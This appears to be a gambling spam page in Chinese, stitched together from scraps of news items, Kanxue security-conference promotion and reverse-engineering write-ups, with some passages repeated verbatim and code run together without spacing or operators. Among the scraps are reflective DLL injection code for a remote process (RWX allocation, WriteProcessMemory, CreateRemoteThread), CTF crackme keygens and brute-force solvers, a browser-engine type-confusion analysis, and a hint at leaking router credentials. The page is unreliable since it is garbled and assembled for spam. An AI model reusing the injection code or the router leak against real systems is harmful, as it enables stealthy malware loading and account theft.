澳门信誉赌场

ASR依赖WindowsDefenderAntivirus作为设备上的主要反病毒程序,并且必须要启用实时保护功能。在年轻generation收集之前,两个半空间的内存都被提交并分配了适当的标签:包含当前对象集合的页面被称为from-space,而对象被复制到的页面被称为to-space。。 会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。前8个字符正好是des块长度,也就是说,我们知道了rc6的部分明文和密文,可以通过rc6解密穷举出rc6后4位key和全部rc6的明文。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。,各级各部门要深入贯彻落实绿色发展理念,深入推进生态文明建设,加快西江生态廊道建设,通过巡河、巡查,找准问题,强化执法监督,严厉打击非法排污、设障、捕捞、养殖、采砂、采矿、围垦、侵占水域岸线等违法活动。,www.vns288877.com、www.vns00888.com、最近一直在研究和总结php中的序列化问题,发现php序列化的问题由来已久,除了在真实的php开源代码中会出现之外,如典型的执行,这种问题在ctf比赛中的也是备受青睐。,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。OD载入,输入123456,点确定半天没反应,忽然来个内存异常。

  • 博客访问: 550590
  • 博文数量: 701
  • 用 户 组: 普通用户
  • 注册时间:2018-8-14 14:40:36
  • 认证徽章:
个人简介

相似的是,仙侠剧多数请到人气演员担纲,故事和拍摄手法也更贴近年轻人。  个盘:  楼市“黑马”  开盘价回归至去年初水平  在今年楼市当中,不时有“黑马”楼盘依靠超低价杀出,成为市场热点。(成林),驱动说明Intel英特尔ChipestDeviceSoftware芯片组驱动版ForWin2008-64/Win2012-64/Win7-32/Win7-64/Win8-32/Win8-64///Win10-32/Win10-64(2015年8月24日发布)近日,我们找到了这款新的Intel芯片组驱动,版本号为,适用于Win2008(64)/Win2012(64)和Win7以上操作系统,且通过了WHQL认证。具体来说,12月12日起,将对所有哔哩哔哩卡用户流量日租宝进行升级,省内1元500MB升今年8月,百度联合中国联通推出了互联网SIM卡百度圣卡,分为小圣卡、大圣卡及超圣卡,月费分别为9元、19元及59元,享受专属APP免流特权。。  湿地,被誉为“地球之肾”。我不想成为第一个吃螃蟹的人,她在接受采访时称。。

文章分类

全部博文(150)

文章存档

2015年(2)

2014年(666)

2013年(890)

2012年(719)

订阅
www.vnsr9977.com 2018-8-14 14:40:36

分类: 宜宾新闻网

在我温暖其冰冷躯体之后,随着油门的深入,声浪渐起,待与这台野兽深入沟通,各种感官渐渐得到满足,试车体验也愈发立体起来。新华社记者王凯摄  1月8日,电力工人在湖南省张家界市桑植县南滩村一处线路故障点除冰。,LPVOIDlpBuffer=HeapAlloc(GetProcessHeap(),0,dwLength);//创建缓冲区if(ReadFile(hFile,lpBuffer,dwLength,dwBytesRead,NULL)==false)//将DLL数据复制到缓冲区BreakForError("FailedtoreadtheDLLfile");HANDLEhTargetProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);HANDLEhMoudle=LoadRemoteLibraryR(hTargetProcess,lpBuffer,dwLength,NULL);//获取加载器的地址(文件偏移)DWORDdwReflectiveLoaderOffset=GetReflectiveLoaderOffset(lpBuffer);//在目标进程分配内存(RWX)LPVOIDlpRemoteLibraryBuffer=VirtualAllocEx(hProcess,NULL,dwLength,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);//写数据WriteProcessMemory(hProcess,lpRemoteLibraryBuffer,lpBuffer,dwLength,NULL);//线程函数的地址=基地址+文件偏移LPTHREAD_START_ROUTINElpReflectiveLoader=(LPTHREAD_START_ROUTINE)((ULONG_PTR)lpRemoteLibraryBuffer+dwReflectiveLoaderOffset);//创建远程线程hThread=CreateRemoteThread(hProcess,NULL,1024*1024,lpReflectiveLoader,lpParameter,(DWORD)NULL,dwThreadId);//基址-在Dropper进程中开辟的堆空间的起始地址UINT_PTRuiBaseAddress=(UINT_PTR)lpReflectiveDllBuffer;//得到NT头的文件地址UINT_PTRuiExportDir=(UINT_PTR)uiBaseAddress+((PIMAGE_DOS_HEADER)uiBaseAddress)-e_lfanew;//获得导出表结构体指针的地址UINT_PTRuiNameArray=(UINT_PTR)(((PIMAGE_NT_HEADERS)uiExportDir)-[IMAGE_DIRECTORY_ENTRY_EXPORT]);//该调用中,第一个参数即为导出表结构体映射到内存的相对虚拟地址//结果为找到到导出表结构体的内存地址uiExportDir=uiBaseAddress+Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)-VirtualAddress,uiBaseAddress);//得到导出表名称数组在内存中的地址RVAuiNameArray=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfNames,uiBaseAddress);//得到导出函数地址表在内存中的地址RVAUINT_PTRuiAddressArray=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfFunctions,uiBaseAddress);//得到函数序号地址表在内存中的地址UINT_PTRuiNameOrdinals=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfNameOrdinals,uiBaseAddress);//导出函数的数量DWORDdwCounter=((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-NumberOfNames;while(dwCounter--){//这里需要将获取到的各表的RVA转化为各表实际的文件偏移char*cpExportedFunctionName=(char*)(uiBaseAddress+Rva2Offset((*(DWORD*)uiNameArray),uiBaseAddress));if(strstr(cpExportedFunctionName,"ReflectiveLoader")!=NULL){//获取地址表起始地址的实际位置uiAddressArray=uiBaseAddress+Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)-AddressOfFunctions,uiBaseAddress);//根据序号找到序号对应的函数地址uiAddressArray+=(*(WORD*)(uiNameOrdinals)*sizeof(DWORD));//返回ReflectiveLoader函数的文件偏移,即函数机器码的起始地址returnRva2Offset((*(DWORD*)uiAddressArray),uiBaseAddress);}uiNameArray+=sizeof(DWORD);uiNameOrdinals+=sizeof(WORD);}DWORDRva2Offset(DWORDdwRva,UINT_PTRuiBaseAddress){//得到nt头在内存中的实际地址PIMAGE_NT_HEADERSpNtHeaders=(PIMAGE_NT_HEADERS)(uiBaseAddress+((PIMAGE_DOS_HEADER)uiBaseAddress)-e_lfanew);//获得节表PIMAGE_SECTION_HEADERpSectionHeader=(PIMAGE_SECTION_HEADER)((UINT_PTR)(pNtHeaders-OptionalHeader)+);//不在任意块内if(dwRvapSectionHeader[0].PointerToRawData)returndwRva;//通过遍历块,来找到相对偏移地址对应的文件偏移地址for(WORDwIndex=0;;wIndex++){if(dwRva=pSectionHeader[wIndex].VirtualAddressdwRva(pSectionHeader[wIndex].VirtualAddress+pSectionHeader[wIndex].SizeOfRawData))return(dwRva-pSectionHeader[wIndex].VirtualAddress+pSectionHeader[wIndex].PointerToRawData);//\------------------块内偏移-------------------/\-----------块在文件中的偏移------------/}}回想我们注射器实现的过程中所调用的函数,与正常的注入似乎没有太大的区别,而且像CreateRemoteProcess这种危险函数杀软抓的很严,是可以被替换掉的,而且没有发现LoadLibraryA函数。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。OD载入,输入123456,点确定半天没反应,忽然来个内存异常。,在全力发展乡村旅游业同时,建设荷花新品种育种基地,引导企业研发和推广莲子、藕粉、荷叶茶、藕糖等覃塘莲藕品牌系列加工产品,并进行富硒产品研发,延伸荷美覃塘产品产业链,提高景区的旅游附加值,进而打造荷文化品牌。来源:Forcepoint安全实验室2017年10月25日本文由看雪翻译小组编译投入低电压整治资金亿元,对5100多个台区进行升级改造,提高农配网供电可靠性,助推乡村产业发展,改善了万群众的用电质量。。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}ListName字段是枚举类型MMLISTS中的一个,它标识了该链表中页的类型。保护声明Forcepoint客户通过Forcepoint云安全(包括高级分类引擎(ACE)作为电子邮件,Web和NGFW安全产品的一部分)得到保护,免受此威胁。 2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。这里的newArr的创建操作如下//IfthesourceobjectisanArrayexoticobjectweshouldtr*newObj=ArraySpeciesCreate(obj,0,scriptContext);JavascriptArray*newArr=nullptr;//Ifthenewobjectwecreatedisanarray,rememberthatasitwillsaveustimesettingpropertiesintheobjectbelowif(JavascriptArray::Is(newObj)){newArr=JavascriptArray::FromVar(newObj);}注意虽然进行了转换,但是最后newArr却是NativeIntArray类型=0x000001E353F7C5100x000001E353F7C5100000000000000003........0x000001E353F7C5180000000600000000........0x000001E353F7C5200000000000000000........0x000001E353F7C5280000000100000002........0x000001E353F7C5300000000380000002.......\n0x000001E353F7C5388000000280000002......\n观察接下来的取值和赋值操作可以发现问题for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}...pArr的类型为JavascriptArraynewArr的类型为JavascriptNativeIntArray这里直接从pArr中取出值放入了newArr,很明显是一个类型混淆造成这个混淆的根本原因是设置了staticget[](){returndummy;}导致返回了一个JavascriptNativeIntArray,从而与JavascriptArray造成混淆。将语句放在console里执行,也可加上javascript:前缀在地址栏里执行:$(.).offset({left:0,top:0}).css({width:93%,height:50%,margin:3}).siblings().hide();要说起来,其实还可将所有注入的js代码通过写入html的script标记的方式从另一个网站上加载,更方便使用。他们使用网络钓鱼,欺骗广告,诈骗技术,社会工程学和其他作为其手段的一部分。,1.处理逻辑name是内置的:readyucode是输入的int__cdeclsub_40AEF0(HWNDhDlg){...GetDlgItemTextA(hDlg,1000,name,64);v1=GetDlgItemTextA(hDlg,1001,code,256);v2=v1;if(v1=0x21){if(code[0]!=0x30){v3=0;if(v1=0){LABEL_9:memset(byte_41BC84,0,sizeof(byte_41BC84));v5=off_418078[check(code,name)];MessageBoxA(hDlg,v5,v5,0);return0;}while(1){v4=code[v3];if(!isxdigit(v4)||islower(v4))break;if(++v3=v2)gotoLABEL_9;}}...}z=10000000000000000000000000000000000000000000000000000000000000000079r=code^5modzr有34字节,前17字节作为x,后17字节作为yepInput=(x,y)根据name计算3个md5值:md0=md5(\x01readyu-pediy)=51C75F1F444BAA97ED18DD6C340835D7md1=md5(\x02\x02readyu-2017)=0E5CF7F068D6EFA16F42F935EC424A75md2=md5(\x03\x03\x03readyu-crackme)=A4CD1D64486ABDE1BE441944460CD41D椭圆曲线:m=131,a=13,b=2,c=1,a2=0,a6=1前面的epInput是这个曲线上的点ep1=(51C99BFA6F18DE467C80C23B98C7994AA,42EA2D112ECEC71FCF7E000D7EFC978BD)ep2=(6C997F3E7F2C66A4A5D2FDA13756A37B1,4A38D11829D32D347BD0C0F584D546E9A)n=200000000000000004D4FDD5703A3F269校验(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modnsignedint__cdeclcheck(char*code,constchar*a2){...get_mip();v29[0]=0;memset(v29[1],0,0x20u);*(_WORD*)v29[33]=0;v29[35]=0;ptr[0]=0x10;ptr[1]=0;ptr[2]=0;ptr[3]=0;ptr[4]=0;ptr[5]=0;ptr[6]=0;ptr[7]=0;ptr[8]=0;ptr[9]=0;ptr[10]=0;ptr[11]=0;ptr[12]=0;ptr[13]=0;ptr[14]=0;ptr[15]=0;ptr[16]=0;ptr[17]=0;ptr[18]=0;ptr[19]=0;ptr[20]=0;ptr[21]=0;ptr[22]=0;ptr[23]=0;ptr[24]=0;ptr[25]=0;ptr[26]=0;ptr[27]=0;ptr[28]=0;ptr[29]=0;ptr[30]=0;ptr[31]=0;ptr[32]=0;ptr[33]=0x79;mirsys_init();v2=z;a2_1=::a2;v4=::x;y=dword_41BC68;x=dword_41BC64;a6=dword_41BC70;w=dword_41BC74;bytes_to_big(34,ptr,z);cinstr(v4,code);if(mr_compare(v4,v2)=0){power(v4,5,v2,w);memset(v29,0,sizeof(v29));if(big_to_bytes(34,w,v29,1)==34){bytes_to_big(17,v29,x);bytes_to_big(17,v29[17],y);convert(0,a2_1);convert(1,a6);v17=1;if(ecurve2_init(131,13,2,1,a2_1,a6,0,0)){qmemcpy(v46,51C99BFA6F18DE467C80C23B98C7994AA,sizeof(v46));qmemcpy(v47,42EA2D112ECEC71FCF7E000D7EFC978BD,sizeof(v47));qmemcpy(v44,6C997F3E7F2C66A4A5D2FDA13756A37B1,sizeof(v44));qmemcpy(v43,4A38D11829D32D347BD0C0F584D546E9A,sizeof(v43));qmemcpy(v45,200000000000000004D4FDD5703A3F269,sizeof(v45));v30=dword_418118;v31=word_41811C;memset(v32,0,sizeof(v32));v33=0;v34=dword_4180E4;v35=byte_4180E8;memset(v36,0,sizeof(v36));v37=0;v38=0;v40=dword_4180F0;v39=dword_4180EC;memset(v41,0,sizeof(v41));a1=0;memset(v49,0,sizeof(v49));v50=0;v51=0;i=0;v6=a1;a3=(char*)mds;lpMem=(flash)v30;do{strcpy(v6,a2);strcat(v6,-);strcat(v6,(constchar*)lpMem);xmd5(v6,strlen(v6),a3,i+1);v6+=256;++i;lpMem+=4;a3+=16;}while(i3);md0=mirvar(0);md1=mirvar(0);md2=mirvar(0);x1=mirvar(0);a3a=mirvar(0);x2=mirvar(0);lpMema=mirvar(0);v9=mirvar(0);ep1=epoint_init();ep2=epoint_init();p1=epoint_init();p2=epoint_init();epInput=epoint_init();if(epoint2_set(x,y,0,epInput)){cinstr(x1,v46);cinstr(a3a,v47);epoint2_set(x1,a3a,0,ep1);cinstr(x2,v44);cinstr(lpMema,v43);epoint2_set(x2,lpMema,0,ep2);bytes_to_big(16,(_BYTE*)mds,md0);bytes_to_big(16,mds[1],md1);bytes_to_big(16,mds[2],md2);ecurve2_mult(md2,ep1,p1);ecurve2_mult(md2,ep2,p2);ecurve2_add(epInput,p1);ecurve2_add(epInput,p2);ecurve2_mult(md0,p1,p1);ecurve2_mult(md1,p2,p2);epoint2_get(p1,x1,a3a);epoint2_get(p2,x2,lpMema);cinstr(v9,v45);divide(x1,v9,v9);divide(x2,v9,v9);v17=3;if(!mr_compare(x1,x2))v17=0;}else{v17=2;}mirkill(md0);mirkill(md1);mirkill(md2);mirkill(x1);mirkill(x2);mirkill(a3a);mirkill(lpMema);mirkill(v9);epoint_free(ep1);epoint_free(ep2);epoint_free(p1);epoint_free(p2);epoint_free(epInput);}mirexit();result=v17;}else{mirexit();result=1;}}else{mirexit();result=1;}returnresult;}2.计算(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modn=epInput=(md2*md1*ep2-md2*md0*ep1)*(((md0-md1)^-1)modn)得到(02D23461BA71B50AF182DC76E5A7C726F5,07BE013AF19BD185BCD20BB341EA31298B)voidtest2(){biga2=mirvar(0);biga6=mirvar(1);if(ecurve2_init(131,13,2,1,a2,a6,0,0)){epoint*epInput=epoint_init();bigx=mirvar(0);bigy=mirvar(0);bigmd0=mirvar(0);bigmd1=mirvar(0);bigmd2=mirvar(0);cinstr(md0,51C75F1F444BAA97ED18DD6C340835D7);cinstr(md1,0E5CF7F068D6EFA16F42F935EC424A75);cinstr(md2,A4CD1D64486ABDE1BE441944460CD41D);epoint*p1=epoint_init();bigx1=mirvar(0);bigy1=mirvar(0);cinstr(x1,51C99BFA6F18DE467C80C23B98C7994AA);cinstr(y1,42EA2D112ECEC71FCF7E000D7EFC978BD);epoint2_set(x1,y1,0,p1);epoint*p2=epoint_init();bigx2=mirvar(0);bigy2=mirvar(0);cinstr(x2,6C997F3E7F2C66A4A5D2FDA13756A37B1);cinstr(y2,4A38D11829D32D347BD0C0F584D546E9A);epoint2_set(x2,y2,0,p2);bign=mirvar(0);cinstr(n,200000000000000004D4FDD5703A3F269);ecurve2_mult(md2,p2,p2);ecurve2_mult(md1,p2,p2);ecurve2_mult(md2,p1,p1);ecurve2_mult(md0,p1,p1);ecurve2_sub(p1,p2);bigr=mirvar(0);bigrd=mirvar(0);bignd=mirvar(0);bigz=mirvar(0);subtract(md0,md1,r);xgcd(r,n,rd,nd,z);ecurve2_mult(rd,p2,epInput);epoint2_get(epInput,x,y);charsx[256];charsy[256];cotstr(x,sx);cotstr(y,sy);printf(%s,sx);printf(%s,sy);}}用RDLP计算得到code7A7102F36F3B344D666132A6FF7EF4BA05B99640BB815C9E712A72C64B6ABC582C2ExploitGuard也出现在WindowsDefenderATP控制台的安全分析仪表板之中。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}通过下面两个请求的uri可以泄露账号和密码,美国网件系列默认用户名admin,  种植结构调整,调出万元增收  